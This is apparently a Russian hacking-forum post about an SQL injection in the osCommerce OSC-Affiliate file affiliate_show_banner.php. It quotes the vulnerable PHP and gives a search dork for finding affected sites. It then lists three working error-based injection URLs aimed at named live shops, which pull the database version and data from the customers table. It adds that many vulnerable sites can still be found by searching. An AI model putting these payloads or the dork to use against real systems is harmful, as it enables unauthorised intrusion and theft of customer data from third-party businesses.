SQL Injection in
/affiliate_show_banner.php
PHP код:
/*
$Id: affiliate_show_banner.php,v 2.00 2003/10/12
OSC-Affiliate
Contribution based on:
osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com
Copyright (c) 2002 - 2003 osCommerce
Released under the GNU General Public License
*/
Уязвимый код
PHP код:
if (isset($HTTP_GET_VARS['affiliate_banner_id'])) $banner_id = $HTTP_GET_VARS['affiliate_banner_id'];
if (isset($HTTP_POST_VARS['affiliate_banner_id'])) $banner_id = $HTTP_POST_VARS['affiliate_banner_id'];
/*..................................................*/
if ($banner_id) {
$sql = "select affiliate_banners_image, affiliate_products_id from " . TABLE_AFFILIATE_BANNERS . " where affiliate_banners_id = '" . $banner_id . "' and affiliate_status = 1";
$banner_values = tep_db_query($sql);
if ($banner_array = tep_db_fetch_array($banner_values)) {
$banner = $banner_array['affiliate_banners_image'];
$products_id = $banner_array['affiliate_products_id'];
}
}
Dork:
inurl:affiliate_show_banner.php
Ex:
Код:
http://www.arcalide.com/affiliate_show_banner.php?ref=1&affiliate_banner_id=1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(version(),floor(rand(0)*2)))--+'
http://www.smoke-world.info/affiliate_show_banner.php?ref=1&affiliate_banner_id=1+and(select+1+from(select+count(*),concat((select+count(*)+from+customers+limit+0,1),floor(rand(0)*2))x+from+customers+group+by+x)a)--+
http://millybridaluk.com/catalog/affiliate_show_banner.php?ref=1&affiliate_banner_id=1%27+AND+extractvalue(1,/*!concat*/(0x3a,(version())))--+%27
пашет только на старых версиях, но тем не менее, можно нагуглить не мало бажных сайтов
osCommerce Affiliate
Линейный вид
